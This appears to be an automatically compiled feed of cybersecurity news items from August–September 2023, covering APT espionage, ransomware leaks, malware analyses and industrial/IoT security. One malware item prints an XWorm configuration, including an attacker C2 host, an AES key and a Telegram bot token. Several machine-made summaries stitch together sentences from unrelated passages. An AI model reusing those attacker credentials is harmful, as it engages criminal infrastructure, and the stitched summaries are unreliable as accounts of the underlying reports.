BlueDelta/Sofacy attacks: According to Recorded Future's Insikt Group and Ukraine's Computer Emergency Response Team (CERT-UA), BlueDelta (aka Sofacy, APT28, Fancy Bear and Sednit) exploited vulnerabilities in Roundcube Webmail to hack more than 40 Ukrainian organizations, including government institutions and military entities connected to aviation infrastructure. Other detected malicious activity included listing processes, testing network connectivity, gathering user and group information, mounting shares, enumerating domain trust over WMI, and listing DNS zones over WMI. The attackers use a variety of techniques in these attacks, including password spraying, brute force, token theft, and session replay, to gain unauthorized access to cloud resources. APT attacks with CommonMagic and CloudWizard framework: Kaspersky researchers discovered an ongoing campaign, active since Q3 2021, targeting government, agricultural and transportation organizations in the conflict-affected region of Eastern Europe, using a previously unknown malware set. Compromised organizations operate in various industries, including manufacturing, wealth management, insurance, and pharmaceuticals. "


      Alphv group claims the hack of Clarion, a global manufacturer of audio and video equipment for cars

      industry
      2023-09-24 https://securityaffairs.com/151299/data-breach/alphv-ransomware-hacked-clarion.html

      The Alphv ransomware group claims to have hacked Clarion, the global manufacturer of audio and video equipment for cars and other vehicles. The Alphv ransomware group added Clarion, the global manufacturer of audio and video equipment for cars and other vehicles, to the list of victims on its Tor leak site. Clarion Japan is the Japanese subsidiary […]

      The post Alphv group claims the hack of Clarion, a global manufacturer of audio and video equipment for cars appeared first on Security Affairs.

      "

      Autosummary: The company has more than 10,000 employees, it also provides its components to other automakers, including Suzuki, Toyota, Subaru, Ford, Volkswagen, Proton, and Peugeot. "


      Deadglyph: New Advanced Backdoor with Distinctive Malware Tactics

      exploits industry
      2023-09-23 https://thehackernews.com/2023/09/deadglyph-new-advanced-backdoor-with.html
      Cybersecurity researchers have discovered a previously undocumented advanced backdoor dubbed Deadglyph employed by a threat actor known as Stealth Falcon as part of a cyber espionage campaign. "Deadglyph's architecture is unusual as it consists of cooperating components – one a native x64 binary, the other a .NET assembly," ESET said in a new report shared with The Hacker News. "This combination "

      Autosummary: Stealth Falcon (aka FruityArmor) was first exposed by the Citizen Lab in 2016, linking it to a set of targeted spyware attacks in the Middle East aimed at journalists, activists, and dissidents in the U.A.E. using spear-phishing lures embedding booby-trapped links pointing to macro-laced documents to deliver a custom implant capable of executing arbitrary commands. "


      Keysight collaborates with Synopsys to secure IoT devices against attacks

      industry
      2023-09-22 https://www.helpnetsecurity.com/2023/09/22/keysight-synopsys/

      Keysight Technologies and Synopsys are partnering to provide internet of things (IoT) device makers with a comprehensive cybersecurity assessment solution to ensure consumers are protected when devices are shipped to market. Under the arrangement, the Synopsys Defensics fuzzing tool will be embedded as an option into the Keysight IoT Security Assessment solution. The global IoT device market is experiencing notable growth due to the rise in adoption of IoT devices and is projected to reach … More

      The post Keysight collaborates with Synopsys to secure IoT devices against attacks appeared first on Help Net Security.

      "

      Autosummary: "


      Regulatory pressure complicates cybersecurity for industrial equipment manufacturers

      industry ciber
      2023-09-21 https://www.helpnetsecurity.com/2023/09/21/industrial-equipment-manufacturers-security/

      50% of companies lack a dedicated security function for control systems and devices within their organizational structure, according to Cybellum. Security incidents involving industrial organizations have seen a sharp rise in recent years, with notable cases highlighting the vulnerabilities in our interconnected world. IT-OT convergence, as well as the trend towards remote maintenance, amplify potential risks even further. As industrial devices become increasingly software-driven machines reliant on an insecure software supply chain, and with regulatory … More

      The post Regulatory pressure complicates cybersecurity for industrial equipment manufacturers appeared first on Help Net Security.

      "

      Autosummary: "


      Rising OT/ICS cybersecurity incidents reveal alarming trend

      industry ciber
      2023-09-20 https://www.helpnetsecurity.com/2023/09/20/ot-ics-cybersecurity-incidents/

      60% of cyberattacks against the industrial sector are led by state-affiliated actors and often unintentionally enabled by internal personnel (about 33% of the time), according to Rockwell Automation. This corroborates other industry research showing OT/ICS (Industrial Control Systems) cybersecurity incidents are increasing in volume and frequency, and are targeting critical infrastructure, such as energy producers. Insiders unintentionally aid threat actors “Energy, critical manufacturing, water treatment and nuclear facilities are among the types of critical infrastructure … More

      The post Rising OT/ICS cybersecurity incidents reveal alarming trend appeared first on Help Net Security.

      "

      Autosummary: Insiders unintentionally aid threat actors “Energy, critical manufacturing, water treatment and nuclear facilities are among the types of critical infrastructure industries under attack in the majority of reported incidents,” said Mark Cristiano, commercial director of Global Cybersecurity Services at Rockwell Automation. "


      Red Hat and Intel deliver open source industrial automation to the manufacturing shop floor

      industry
      2023-09-20 https://www.helpnetsecurity.com/2023/09/20/red-hat-intel/

      Red Hat announced a new industrial edge platform, designed in collaboration with Intel, that will provide a modern approach to building and operating industrial controls. By transforming the way manufacturers operate, scale and innovate with standard IT technologies delivered to the plant floor and real-time data insights, the platform will enable industrial control system (ICS) vendors, system integrators (SIs) and manufacturers to automate previously manual industrial automation tasks including: system development, deployment and management, cybersecurity … More

      The post Red Hat and Intel deliver open source industrial automation to the manufacturing shop floor appeared first on Help Net Security.

      "

      Autosummary: With this collaboration organizations can benefit from: fully integrated real-time capabilities from silicon to software, to support industrial automation for predictable performance; advanced management and network automation for system deployment and management without heavy-handed resource usage, simplifying industrial network creation and management using open standards-based tools; scalability and flexibility through a software-defined platform approach that facilitates more portable, scalable control and maximizes adaptability; uninterrupted operations supported by high-availability and redundancy attributes built into the platform; simplified AI workload integration with the ability to take an AI workload and run it next to a control workload, helping simplify hardware complexity and enabling AI to more easily improve product quality, system uptime, maintenance needs and more; and an enhanced cybersecurity posture by removing human error elements with automated patching and updates, an immutable operating system plane and a platform built on hardened, production-tested components. "


      Inside Tiktok's real-life frenzies - from riots to false murder accusations

      industry
      2023-09-20 https://www.bbc.co.uk/news/technology-66719572?at_medium=RSS&at_campaign=KARANGA
      Former staff and users tell the BBC the app's algorithm has encouraged harmful real-life behaviour. "

      Autosummary: "


      Inside XWorm: Malware Analysts Decode the Stealthy Tactics of the Latest Variant

      exploits industry
      2023-09-19 https://thehackernews.com/2023/09/inside-code-of-new-xworm-variant.html
      XWorm is a relatively new representative of the remote access trojan cohort that has already earned its spot among the most persistent threats across the globe.  Since 2022, when it was first observed by researchers, it has undergone a number of major updates that have significantly enhanced its functionality and solidified its staying power.  The analyst team at ANY.RUN came across the newest "

      Autosummary: XWorm's Tactics, Techniques, and Procedures (TTPs): The sandbox report highlighted several techniques used by the sample (Figure 3: XWorm's activities on the infected system). Configuration values: Host 6[.]tcp.eu.ngrok[.]io | Port 13394 | AES key Slaves!-.;!2Swezy999!(xxx | Splitter Xwormmm | Sleep time 3 | USB drop file USB.exe | Mutex Lz8qftMH08V7f1rq | Log file %temp%\Log.tmp | Telegram token 6674821695:AAExQsr6_hmXk6hz7CN4kMSi9cs9y86daYM | Telegram chat id 5865520781. Conclusion: Obtaining configurations of the latest malware is crucial but time-consuming. XWorm's failed attempt to evade sandbox analysis: Since the initial analysis report was several days old, the team decided to run the sample through the sandbox once again to check for new activities. From there, the only logical step for the team was to open the file in dnSpy, a .NET debugger, which promptly revealed that the binary was subject to heavy obfuscation. "


      Industrial cybersecurity giant Dragos rakes in new funding, sets sights on global expansion

      industry ciber
      2023-09-18 https://www.helpnetsecurity.com/2023/09/18/darren-sankbeil-dragos-ics-ot-environments-cybersecurity/

      Today, Dragos revealed that it has secured a $74 million Series D extension funding round, spearheaded by the strategic operating and investment firm WestCap. The funding extension comes when global governments and infrastructure providers increasingly acknowledge the critical role of industrial cybersecurity, necessitating enhanced focus on their ICS/OT settings. In an interview with Help Net Security, Darren Sankbeil, CFO of Dragos, discusses the significance of this investment for the firm amid the rising urgency to … More

      The post Industrial cybersecurity giant Dragos rakes in new funding, sets sights on global expansion appeared first on Help Net Security.

      "

      Autosummary: In addition to our historically strong presence in the Electric, Oil & Gas, Water, and Federal Government sectors, we are seeing the Manufacturing, Food and Beverage, and Technology sectors increase in prominence as a percentage of our business. The Dragos Platform is technology built for practitioners by practitioners that arms industrial cybersecurity teams with the most up-to-date defensive tools, codified by our experts on the front lines every day hunting, combatting, and responding to advanced ICS threats. We launched the Dragos Global Partner Program this year, the only channel program to comprise OT cybersecurity technology, services, and threat intelligence as well as training. "


      Deepfake and smishing. How hackers compromised the accounts of 27 Retool customers in the crypto industry

      financial industry
      2023-09-18 https://securityaffairs.com/150981/hacking/retool-smishing-attack.html

      Software development company Retool was the victim of a smishing attack that resulted in the compromise of 27 accounts of its cloud customers. Software development company Retool revealed that 27 accounts of its cloud customers were compromised as a result of an SMS-based social engineering attack. The company states that one of its employees was […]

      The post Deepfake and smishing. How hackers compromised the accounts of 27 Retool customers in the crypto industry appeared first on Security Affairs.

      "

      Autosummary: But through this Google update, what was previously multi-factor-authentication had silently (to administrators) become single-factor-authentication, because control of the Okta account led to control of the Google account, which led to control of all OTPs stored in Google Authenticator. How hackers compromised the accounts of 27 Retool customers in the crypto industry. Pierluigi Paganini, September 18, 2023. Software development company Retool was the victim of a smishing attack that resulted in the compromise of 27 accounts of its cloud customers. "


      Europol lifts the lid on cybercrime tactics

      industry
      2023-09-15 https://www.malwarebytes.com/blog/news/2023/09/europol-publishes-report-discussing-observed-methodologies-and-threats

      Categories: News, Ransomware

      Tags: Europol, Phishing, RDP, VPN, Exchange, LOTL, BEC, ransomware, IAB, crypter, Flubot

      A Europol report discusses developments in cyberattacks, new methodologies, and threats as observed by Europol’s operational analysts.

      The post Europol lifts the lid on cybercrime tactics appeared first on Malwarebytes Labs.

      "

      Autosummary: The most common service providers for ransomware groups include initial access brokers (IABs), crypter developers, droppers-as-a-service, money laundering, and bullet-proof hosting services. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. These groups work closely with other malware-as-a-service groups to compromise high-revenue targets and post huge ransom demands, running into millions of Euros. "


      DDoS 2.0: IoT Sparks New DDoS Alert

      industry
      2023-09-15 https://thehackernews.com/2023/09/ddos-20-iot-sparks-new-ddos-alert.html
      The Internet of Things (IoT) is transforming efficiency in various sectors like healthcare and logistics but has also introduced new security risks, particularly IoT-driven DDoS attacks. This article explores how these attacks work, why they’re uniquely problematic, and how to mitigate them. What Is IoT? IoT (Internet of Things) refers to online, interconnected devices that collect and exchange "

      Autosummary: (Figure: process flow, demonstrating scanning, compromising, infecting and joining a new device to a botnet.) Advanced botnets can self-propagate, compromising more devices autonomously, bringing more and more devices into the botnet, expanding the botnet's size and amplifying the scale of future attacks. Controlled by attackers, botnets can scale and rapidly execute various attacks, including DDoS, data theft, ad fraud, cryptocurrency mining, spam and phishing, data harvesting, and snooping—without device owners' knowledge. This broad category of devices includes sensors, cameras, network routers, and advanced machinery, and their integration into everyday life and work processes results in an ecosystem that can automate operations, improve decision-making, and enhance user experience. Incorporating IoT Devices into Botnets: IoT devices that are unpatched, unattended, or misconfigured, or are already under botnet DDoS attack, are at risk of being incorporated into a botnet. Initiatives like the Cyber Threat Alliance and the Joint Cyber Defense Collaborative unite governments, tech companies, and cybersecurity firms to rapidly detect and neutralize emerging threats, strengthening collective global defenses. "


      Brazil riots: First man tried for storming government buildings gets 17 years

      latam government industry
      2023-09-14 https://www.bbc.co.uk/news/world-latin-america-66810835?at_medium=RSS&at_campaign=KARANGA
      Aecio Pereira is the first to be convicted over the storming of government buildings in January. "

      Autosummary: "


      Researchers Detail 8 Vulnerabilities in Azure HDInsight Analytics Service

      industry
      2023-09-13 https://thehackernews.com/2023/09/researchers-detail-8-vulnerabilities-in.html
      More details have emerged about a set of now-patched cross-site scripting (XSS) flaws in the Microsoft Azure HDInsight open-source analytics service that could be weaponized by a threat actor to carry out malicious activities. "The identified vulnerabilities consisted of six stored XSS and two reflected XSS vulnerabilities, each of which could be exploited to perform unauthorized actions, "

      Autosummary: "These weaknesses collectively allow an attacker to inject and execute malicious scripts when the stored data is retrieved and displayed to users," Ben Shitrit noted, urging organizations to implement adequate input validation and output encoding to "ensure that user-generated data is properly sanitized before being displayed in web pages." "


      Threat landscape for industrial automation systems. Statistics for H1 2023

      industry
      2023-09-13 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-statistics-for-h1-2023/
      The statistical data presented in the report was received from ICS computers protected by Kaspersky products that Kaspersky ICS CERT categorizes as part of the industrial infrastructure at organizations. "

      Autosummary: This group includes Windows computers that perform one or several of the following functions: supervisory control and data acquisition (SCADA) servers; data storage servers (Historian); data gateways (OPC); stationary workstations of engineers and operators; mobile workstations of engineers and operators; Human Machine Interface (HMI); computers used for industrial network administration; computers used to develop software for industrial automation systems. For the purposes of this report, “attacked computers” are those on which Kaspersky security solutions blocked one or more threats during the period in review (in the diagrams above, this can be a month, half-year or year, depending on the context). Categories of malicious objects: malicious scripts and phishing pages were blocked on 12.7% of ICS computers; denylisted internet resources, on 11.3%; spyware, on 6%; malicious documents, on 4%; ransomware, on 0.32%. (Figure: Ten countries and territories with the lowest percentage of ICS computers on which malicious objects were blocked, H1 2023.) Individual industries: In H1 2023, the percentage of ICS computers on which malicious objects were blocked increased in engineering and ICS integration (by 2 pp), manufacture (by 1.9 pp) and energy (by 1.5 pp). Email clients – 6%; removable devices – 3.4%. Good news: H1 2022 saw a noticeable increase in the percentage of ICS computers on which the following threats were blocked: spyware, malicious documents, malicious miners in the form of Windows executables, ransomware. That was the bad news. (Figure: Regions ranked by percentage of ICS computers on which threats from the internet were blocked, H1 2023.) The largest increase in the percentage of ICS computers on which internet threats were blocked in the first half of 2023 was recorded in the regions that were historically the safest: Western Europe (by 2.6 pp), the United States and Canada (by 2 pp), and Australia and New Zealand (by 1.4 pp).
(Figures: H1 2023 changes in the percentages of ICS computers on which denylisted internet resources were blocked, by region; H1 2023 changes in the percentages of ICS computers on which malicious scripts and phishing pages were blocked, by region.) Both threat types spread via the internet, while malicious scripts and phishing pages also spread via email. (Figure: Percentage of ICS computers on which malicious objects were blocked, by regions.) You may remember that in the previous half-year, the percentage of ICS computers in Russia and Central Asia on which malicious objects were blocked increased noticeably due to mass infection of websites, including those run by industrial companies, that used an outdated version of a popular Russian CMS. (Figures: Percentage of ICS computers on which malicious objects from various sources were blocked; The percentage of ICS computers on which network folder threats were blocked.) As is the case with the overall threat statistics, the percentage of ICS computers on which malicious objects from various sources were blocked varies by region and country. (Figure: Fifteen countries and territories with the highest percentage of ICS computers on which internet threats were blocked, H1 2023.) Email clients: Since the first half of 2022, Southern Europe has remained the region with the highest percentage of ICS computers on which malicious email attachments and phishing links were blocked. (Figure: Percentage of ICS computers on which malicious objects were blocked, by half year.) That said, the percentage of attacked ICS computers dropped in Q1 2023, but then rose again in Q2 2023, reaching the highest quarterly figure since 2022. "


      Guyana scrambles to make the most of oil wealth

      industry
      2023-09-10 https://www.bbc.co.uk/news/world-latin-america-66715777?at_medium=RSS&at_campaign=KARANGA
      Guyana's president says the country has to hurry if it wants to maximise its recent discoveries. "

      Autosummary: "


      Ukraine's CERT Thwarts APT28's Cyberattack on Critical Energy Infrastructure

      industry ciber
      2023-09-06 https://thehackernews.com/2023/09/ukraines-cert-thwarts-apt28s.html
      The Computer Emergency Response Team of Ukraine (CERT-UA) on Tuesday said it thwarted a cyber attack against an unnamed critical energy infrastructure facility in the country. The intrusion, per the agency, started with a phishing email containing a link to a malicious ZIP archive that activates the infection chain. “Visiting the link will download a ZIP archive containing three JPG images ( "

      Autosummary: "Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file "weblinks.cmd" to the victim's computer," CERT-UA said, attributing it to the Russian threat actor known as APT28 (aka BlueDelta, Fancy Bear, Forest Blizzard, or FROZENLAKE). "


      LockBit leaks sensitive data from maximum security fence manufacturer

      ransomware industry
      2023-09-05 https://www.helpnetsecurity.com/2023/09/05/zaun-breach/

      The LockBit ransomware group has breached Zaun, a UK-based manufacturer of fencing systems for military sites and critical utilities, by compromising a legacy computer running Windows 7 and using it as an initial point of access to the wider company network. The Zaun breach The company said that the “sophisticated” cyberattack occurred on the 5th – 6th August. “In an otherwise up-to-date network, the breach occurred through a rogue Windows 7 PC that was running … More

      The post LockBit leaks sensitive data from maximum security fence manufacturer appeared first on Help Net Security.

      "

      Autosummary: Some of the stolen data was later leaked by LockBit on the dark web and, according to the Daily Mirror, among it were “thousands of pages of data which could help criminals get into the HMNB Clyde nuclear submarine base, the Porton Down chemical weapon lab and a GCHQ listening post.” "


      New Python Variant of Chaes Malware Targets Banking and Logistics Industries

      financial exploits industry
      2023-09-05 https://thehackernews.com/2023/09/new-python-variant-of-chaes-malware.html
      Banking and logistics industries are under the onslaught of a reworked variant of a malware called Chaes. "It has undergone major overhauls: from being rewritten entirely in Python, which resulted in lower detection rates by traditional defense systems, to a comprehensive redesign and an enhanced communication protocol," Morphisec said in a new detailed technical write-up shared with The Hacker "

      Autosummary: Chrautos, an updated version of Chronod and Appita that focuses on gathering data from Mercado Libre, Mercado Pago, and WhatsApp; Stealer, an improved variant of Chrolog which plunders credit card data, cookies, autofill, and other information stored in web browsers; and File Uploader, which uploads data related to MetaMask's Chrome extension. Persistence on the host is accomplished by means of a scheduled task, while C2 communications entail the use of WebSockets, with the implant running in an infinite loop to await further instructions from the remote server. "


      The power of passive OS fingerprinting for accurate IoT device identification

      industry
      2023-08-31 https://www.helpnetsecurity.com/2023/08/31/passive-os-fingerprinting/

      The number of IoT devices in enterprise networks and across the internet is projected to reach 29 billion by the year 2030. This exponential growth has inadvertently increased the attack surface. Each interconnected device can potentially create new avenues for cyberattacks and security breaches. The Mirai botnet demonstrated just that, by using thousands of vulnerable IoT devices to launch massive DDoS attacks on critical internet infrastructure and popular websites. To effectively safeguard against the risks … More

      The post The power of passive OS fingerprinting for accurate IoT device identification appeared first on Help Net Security.

      "

      Autosummary: Converging networking and security functions can allow automated collection and correlation of networking and security data from multiple sources, such as intrusion detection systems, firewall logs, and endpoint security solutions, to provide an overview of network activity and its relation to operating systems and IoT devices. Different operating systems implement TCP/IP attributes differently and may have unique values for TCP/IP fields, such as the initial time to live (TTL), window size, TCP flags, and more. "


      PagerDuty strengthens analytics capabilities and expands generative AI offerings

      industry
      2023-08-31 https://www.helpnetsecurity.com/2023/08/31/pagerduty-runbook-automation/

      PagerDuty introduced AI-generated runbooks in early access, as well as new analytics capabilities for the PagerDuty Operations Cloud. Using PagerDuty Runbook Automation from the Operations Cloud, customers replace manual procedures with automated self-service workflows, potentially saving hundreds of working days per year. With PagerDuty’s new generative AI capabilities, customers could realize hundreds of thousands of dollars in annual operational cost savings by using natural-language prompts paired with prompt-engineering automation–high quality prompts iteratively guiding users–to initiate … More

      The post PagerDuty strengthens analytics capabilities and expands generative AI offerings appeared first on Help Net Security.

      "

      Autosummary: This new feature in PagerDuty Runbook Automation is the latest in a series of PagerDuty’s GenAI capabilities, which will be available across the PagerDuty Operations Cloud to help organizations automate time-critical, high-impact work, improve productivity and meaningfully reduce operating costs in uncertain economic times. "


      Velociraptor: Open-source digital forensics and incident response

      industry
      2023-08-30 https://www.helpnetsecurity.com/2023/08/30/velociraptor-open-source-digital-forensics-incident-response/

      Velociraptor is a sophisticated digital forensics and incident response tool designed to improve your insight into endpoint activities. Velociraptor enables you to conduct precise and rapid collection of digital forensic data across multiple endpoints simultaneously. Persistently gather events from endpoints, including event logs, file changes, and process activities. Store these events centrally for an unlimited period, allowing for historical examination and analysis. Be proactive rather than reactive. You can use a collection of forensic artifacts … More

      The post Velociraptor: Open-source digital forensics and incident response appeared first on Help Net Security.

      "

      Autosummary: "


      What true diversity in the cybersecurity industry looks like

      industry ciber
      2023-08-28 https://www.helpnetsecurity.com/2023/08/28/diversity-cybersecurity-industry-video/

      In this Help Net Security video, Larry Whiteside, Jr., CISO at RegScale and President of Cyversity, discusses how, now more than ever, the cybersecurity industry needs the diversity of thought to address the increasingly complex and technology-driven challenges organizations face.

      The post What true diversity in the cybersecurity industry looks like appeared first on Help Net Security.

      "

      Autosummary: "


      KmsdBot Malware Gets an Upgrade: Now Targets IoT Devices with Enhanced Capabilities

      exploits industry
      2023-08-28 https://thehackernews.com/2023/08/kmsdbot-malware-gets-upgrade-now.html
      An updated version of a botnet malware called KmsdBot is now targeting Internet of Things (IoT) devices, simultaneously branching out its capabilities and the attack surface. "The binary now includes support for Telnet scanning and support for more CPU architectures," Akamai security researcher Larry W. Cashdollar said in an analysis published this month. The latest iteration, "

      Autosummary: "The ongoing activities of the KmsdBot malware campaign indicate that IoT devices remain prevalent and vulnerable on the internet, making them attractive targets for building a network of infected systems," Cashdollar said. "


      Talon unveils digital experience capabilities, equipping IT teams with advanced metrics

      industry
      2023-08-24 https://www.helpnetsecurity.com/2023/08/24/talon-digital-experience-capabilities/

      Talon Cyber Security has released new digital experience capabilities available in the Talon Enterprise Browser. The capabilities arm IT teams with advanced metrics on device, application, and network performance to ensure that issues can be proactively resolved, and employees have consistent user experiences that power productivity. “In today’s work-from-anywhere world, it is mission critical that security tools do not negatively impact the user experiences that workforces expect,” said Ohad Bobrov, CTO, Talon Cyber Security. “By … More

      The post Talon unveils digital experience capabilities, equipping IT teams with advanced metrics appeared first on Help Net Security.

      "

      Autosummary: "


      Anticipating the next wave of IoT cybersecurity challenges

      industry ciber
      2023-08-23 https://www.helpnetsecurity.com/2023/08/23/roland-atoui-red-alert-labs-interconnected-iot-environment/

      In this Help Net Security interview, Roland Atoui, Managing Director at Red Alert Labs, discusses the intricacies of transitioning from isolated IoT setups to interconnected environments, examining the broadening attack surface and the nuanced complexities this evolution imposes. Atoui also delves into the urgency for standardization, the threat of cascade failures, and the blurred lines of accountability among stakeholders. Given the transition from siloed IoT devices to interconnected IoT environments, what are the main challenges … More

      The post Anticipating the next wave of IoT cybersecurity challenges appeared first on Help Net Security.

      "

      Autosummary: This layered scrutiny reinforces the collective resilience of the entire IoT environment, addressing the multifaceted challenges of interoperability, security, and installation, and ultimately setting a benchmark in cybersecurity excellence. A comprehensive understanding of the interaction between hardware, software, and human actors helps in creating a coherent, unified security strategy. "


      Ecuador election: Narco politics rule ahead of polls

      industry
      2023-08-18 https://www.bbc.co.uk/news/world-latin-america-66540765?at_medium=RSS&at_campaign=KARANGA
      A rise in drug crime in the once-peaceful country has dominated the build-up to Sunday's election. "

      Autosummary: "


      A closer look at the new TSA oil and gas pipeline regulations

      industry
      2023-08-18 https://www.helpnetsecurity.com/2023/08/18/tsa-oil-and-gas-pipeline-regulations-video/

      The TSA has announced updates to its Security Directive (SD) to strengthen the operational resilience of oil and natural gas pipeline owners and operators against cyber-attacks. In this Help Net Security video, Chris Warner, OT Senior Security Consultant at GuidePoint Security, discusses how these newly introduced provisions mandate pipeline owners and operators to proactively enhance their systems’ security and protect against potential cybersecurity threats in the oil and natural gas sector. Despite the resource challenges, … More

      The post A closer look at the new TSA oil and gas pipeline regulations appeared first on Help Net Security.

      "

      Autosummary: "


      Cleaning Products manufacturer Clorox Company took some systems offline after a cyberattack

      industry ciber
      2023-08-17 https://securityaffairs.com/149585/cyber-crime/clorox-company-cyber-attack.html

      Cleaning products manufacturer Clorox Company announced that it has taken some systems offline in response to a cyberattack. The Clorox Company is a multinational consumer goods company that specializes in the production and marketing of various household and professional cleaning, health, and personal care products. The cleaning product giant announced it was the victim of […]

      The post Cleaning Products manufacturer Clorox Company took some systems offline after a cyberattack appeared first on Security Affairs.

      "

      Autosummary: "


      Major U.S. energy org targeted in QR code phishing attack

      financial industry
      2023-08-16 https://www.bleepingcomputer.com/news/security/major-us-energy-org-targeted-in-qr-code-phishing-attack/
      A phishing campaign was observed predominantly targeting a notable energy company in the US, employing QR codes to slip malicious emails into inboxes and bypass security. [...] "

      Autosummary: Roughly one-third (29%) of the 1,000 emails attributed to this campaign targeted a large US energy company, while the remaining attempts were made against firms in manufacturing (15%), insurance (9%), technology (7%), and financial services (6%). "


      A massive phishing campaign using QR codes targets the energy sector

      financial industry
      2023-08-16 https://securityaffairs.com/149567/hacking/phishing-campaign-qr-codes.html

      A phishing campaign employing QR codes targeted a leading energy company in the US, cybersecurity firm Cofense reported. Starting from May 2023, researchers from Cofense discovered a large-scale phishing campaign using QR codes in attacks aimed at stealing the Microsoft credentials of users from multiple industries. One of the organizations targeted by hackers is a […]

      The post A massive phishing campaign using QR codes targets the energy sector appeared first on Security Affairs.

      "

      Autosummary: “Other top 4 targeted industries include Manufacturing, Insurance, Technology, and Financial Services seeing 15%, 9%, 7%, and 6% of the campaign traffic respectively.” "


      Monti Ransomware Returns with New Linux Variant and Enhanced Evasion Tactics

      exploits ransomware industry
      2023-08-15 https://thehackernews.com/2023/08/monti-ransomware-returns-with-new-linux.html
      The threat actors behind the Monti ransomware have resurfaced after a two-month break with a new Linux version of the encryptor in its attacks targeting government and legal sectors. Monti emerged in June 2022, weeks after the Conti ransomware group shut down its operations, deliberately imitating the tactics and tools associated with the latter, including its leaked source code. Not anymore. "

      Autosummary: "


      How manufacturers can navigate cybersecurity regulations amid NIST 2.0

      industry ciber
      2023-08-14 https://www.helpnetsecurity.com/2023/08/14/cybersecurity-regulations-nist-2-0-video/

      The National Institute of Standards and Technology (NIST) released a discussion draft for possible Cybersecurity Framework (CSF) changes earlier this year. The proposed changes aim to help increase the CSF’s clarity and bring the updated version closer to national and international cybersecurity standards and practices. In this Help Net Security video, Ahmik Hindman, Sr. Network & Security Solution Consultant at Rockwell Automation, discusses the evolving cybersecurity landscape and what the new cybersecurity framework could mean … More

      The post How manufacturers can navigate cybersecurity regulations amid NIST 2.0 appeared first on Help Net Security.

      "

      Autosummary: "


      Researchers Shed Light on APT31's Advanced Backdoors and Data Exfiltration Tactics

      industry
      2023-08-11 https://thehackernews.com/2023/08/researchers-shed-light-on-apt31s.html
      The Chinese threat actor known as APT31 (aka Bronze Vinewood, Judgement Panda, or Violet Typhoon) has been linked to a set of advanced backdoors that are capable of exfiltrating harvested sensitive information to Dropbox. The malware is part of a broader collection of more than 15 implants that have been put to use by the adversary in attacks targeting industrial organizations in Eastern Europe "

      Autosummary: "


      Industrial PLCs worldwide impacted by CODESYS V3 RCE flaws

      industry
      2023-08-11 https://www.bleepingcomputer.com/news/security/industrial-plcs-worldwide-impacted-by-codesys-v3-rce-flaws/
      Millions of PLC (programmable logic controllers) used in industrial environments worldwide are at risk to 15 vulnerabilities in the CODESYS V3 software development kit, allowing remote code execution (RCE) and denial of service (DoS) attacks. [...] "

      Autosummary: "


      Common TTPs of attacks against industrial organizations. Implants for uploading data

      industry
      2023-08-10 https://ics-cert.kaspersky.com/publications/common-ttps-of-attacks-against-industrial-organizations-implants-for-uploading-data/
      In this part we present information on the four types of implants and two tools used during the last (third) stage of the attacks discovered. "

      Autosummary: Tool used to upload files to Yandex Disk (AuditSvc.exe). Tool used to upload files to temporary file sharing services (transfer.exe). Along with various parameters designed for flexibility and optimization, the tool can generate and use a client-side RSA key. Third-step implant variant sending “.rar” files to some local C2. Later, the threat actor deployed a new variant of the second-step implant, whose capabilities included looking up file names in the Outlook folder (i.e., email account names), executing remote commands and uploading local or remote “.rar” files to Dropbox by calling the third-step implant. 
The entire stack of implants used in attacks can be divided into three categories based on their roles: first-stage implants for persistent remote access and initial data gathering; second-stage implants for gathering data and files, including from air-gapped systems; third-stage implants and tools used to upload data to C2. Second-step implant starts a third-step implant (named “cl.exe”) to upload “.rar” files to Dropbox. It should be noted that before calling the third-step implant to upload files, the second-step implant prepends a custom header to each “.rar” file. JSON log produced by the tool. The threat actor most probably used the tool manually or semi-manually to upload logs and other files to file sharing services, while the resulting JSON containing URLs could be uploaded by any of the first-stage implants described in the first part of the article or by the implant designed to send a single file, “111.log”, as an email attachment via the Yandex email service (that implant is described below). Using some unknown tool to check privileges to access a remote host. To upload local files, the second-step implant calls a third-step implant, which is supposed to be already deployed on the machine either at the statically defined path “c:/users/public/” or at the same path as the second-step implant. "


      Recent ransomware attacks share curiously similar tactics

      exploits ransomware industry
      2023-08-09 https://www.helpnetsecurity.com/2023/08/09/ransomware-attacks-similarities/

      A series of ransomware attacks made by different groups share curiously similar characteristics, according to Sophos. Sophos released new findings into the connections between the most prominent ransomware groups this past year, including Royal, in its Clustering Attacker Behavior Reveals Hidden Patterns report. Distinct similarities found in recent ransomware attacks: Over the course of three months beginning in January 2023, Sophos X-Ops investigated four different ransomware attacks, one involving Hive, two by Royal, and one … More

      The post Recent ransomware attacks share curiously similar tactics appeared first on Help Net Security.

      "

      Autosummary: Distinct similarities found in recent ransomware attacks: Over the course of three months beginning in January 2023, Sophos X-Ops investigated four different ransomware attacks, one involving Hive, two by Royal, and one by Black Basta, and noticed distinct similarities between the attacks. "


      Preventative medicine for securing IoT tech in healthcare organizations

      industry
      2023-08-09 https://www.bleepingcomputer.com/news/security/preventative-medicine-for-securing-iot-tech-in-healthcare-organizations/
      Healthcare organizations are increasingly at risk from threat actors targeting Internet of Medical Things. Learn more from Outpost24 on how attack surface management can secure the IoMT devices. [...] "

      Autosummary: Cloud-based databases, network services, firmware, specific individual devices, storage systems, servers, and web-based apps can each contribute to either the safety or vulnerability of an overall system’s robust security program. Using a combination of specialist in-house expertise along with our proprietary automation platform and attack surface analysis tools, we can provide everything from a single point-in-time risk analysis to longer-term planning, execution, and metrics collection as you work to reduce your exposure to Internet-based attacks. The IoT provides enhanced AI-enabled communication between a wide variety of devices, including mobile phones, wearable devices, industrial sensors, and actuating ports, which convey information through cloud storage databases. This type of attack offers a wide range of potential for manipulating and extorting healthcare organizations, whose databases contain an abundance of sensitive information about patient medical histories, current health records, home addresses, and financial details. "


      NetRise unveils SBOM and vulnerability prioritization solutions to enhance XIoT firmware security

      exploits industry
      2023-08-09 https://www.helpnetsecurity.com/2023/08/09/netrise-platform-sbom/

      NetRise announced advanced capabilities for maintaining and working with Software Bill of Materials (SBOMs) and support for the CISA’s KEV Catalog for managing and understanding the risks associated with software components in the firmware of connected devices. As the security of the software and firmware supply chain and regulation around SBOMs continue to dominate the industry landscape, the impact of consuming and generating a list of ‘ingredients’ for each device cannot be overstated. With the … More

      The post NetRise unveils SBOM and vulnerability prioritization solutions to enhance XIoT firmware security appeared first on Help Net Security.

      "

